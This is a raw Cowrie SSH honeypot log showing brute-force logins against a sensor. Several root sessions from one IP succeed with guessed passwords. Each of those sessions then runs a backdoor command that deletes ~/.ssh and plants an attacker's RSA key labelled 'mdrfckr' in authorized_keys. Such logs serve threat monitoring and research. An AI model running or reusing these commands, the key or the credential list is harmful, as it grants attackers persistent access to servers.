{"eventid":"cowrie.login.success","username":"root","password":"Qwerty@2024","message":"login attempt [root/Qwerty@2024] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:22:59.036194Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:22:59.671536Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:22:59.672248Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:22:59.673295Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:59.964829Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:00.561217Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:00.561971Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:00.853347Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:00.854282Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47806,"dst_ip":"1.2.3.4","dst_port":22,"session":"f00f43604c5b","protocol":"ssh","message":"New connection: 212.227.235.229:47806 (1.2.3.4:22) [session: f00f43604c5b]","sensor":"my-vps","timestamp":"2025-09-09T06:23:01.158590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:01.159539Z","src_ip":"212.227.235.229","session":"f00f43604c5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:01.461828Z","src_ip":"212.227.235.229","session":"f00f43604c5b"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":50612,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9df38b13e43","protocol":"ssh","message":"New connection: 118.26.39.178:50612 (1.2.3.4:22) [session: b9df38b13e43]","sensor":"my-vps","timestamp":"2025-09-09T06:23:02.684386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:02.685399Z","src_ip":"118.26.39.178","session":"b9df38b13e43"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:02.712521Z","src_ip":"212.227.235.229","session":"f00f43604c5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:02.887961Z","src_ip":"118.26.39.178","session":"b9df38b13e43"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"111111","message":"login attempt [mysql/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:03.742273Z","src_ip":"118.26.39.178","session":"b9df38b13e43"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.032505Z","src_ip":"212.227.235.229","session":"f00f43604c5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49726,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e91392fc353","protocol":"ssh","message":"New connection: 212.227.235.229:49726 (1.2.3.4:22) [session: 1e91392fc353]","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.187759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.189600Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48130,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b21812e4863","protocol":"ssh","message":"New connection: 212.227.235.229:48130 (1.2.3.4:22) [session: 8b21812e4863]","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.340102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.340834Z","src_ip":"212.227.235.229","session":"8b21812e4863"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.351319Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.648151Z","src_ip":"212.227.235.229","session":"8b21812e4863"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:04.944794Z","src_ip":"118.26.39.178","session":"b9df38b13e43"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123asd","message":"login attempt [root/asd123asd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.041982Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:05.421161Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.421840Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.422813Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46224,"dst_ip":"1.2.3.4","dst_port":22,"session":"aac485ba3f87","protocol":"ssh","message":"New connection: 212.227.235.229:46224 (1.2.3.4:22) [session: aac485ba3f87]","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.447683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.450937Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.586061Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.799596Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:05.927429Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.928119Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:05.930980Z","src_ip":"212.227.235.229","session":"8b21812e4863"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.092143Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.093023Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.224062Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.239212Z","src_ip":"212.227.235.229","session":"8b21812e4863"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40366,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a71726b52f6","protocol":"ssh","message":"New connection: 212.227.235.229:40366 (1.2.3.4:22) [session: 3a71726b52f6]","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.256011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.256864Z","src_ip":"212.227.235.229","session":"3a71726b52f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:06.422423Z","src_ip":"212.227.235.229","session":"3a71726b52f6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:07.125077Z","src_ip":"212.227.235.229","session":"3a71726b52f6"}
{"eventid":"cowrie.login.success","username":"root","password":"$3rv(ce","message":"login attempt [root/$3rv(ce] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:07.324616Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:08.110321Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.111135Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.112001Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59388,"dst_ip":"1.2.3.4","dst_port":22,"session":"69333b5b7f24","protocol":"ssh","message":"New connection: 212.227.235.229:59388 (1.2.3.4:22) [session: 69333b5b7f24]","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.192512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.193508Z","src_ip":"212.227.235.229","session":"69333b5b7f24"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.291809Z","src_ip":"212.227.235.229","session":"3a71726b52f6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.439582Z","src_ip":"212.227.235.229","session":"69333b5b7f24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40370,"dst_ip":"1.2.3.4","dst_port":22,"session":"b638e339c0e1","protocol":"ssh","message":"New connection: 212.227.235.229:40370 (1.2.3.4:22) [session: b638e339c0e1]","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.459791Z"}
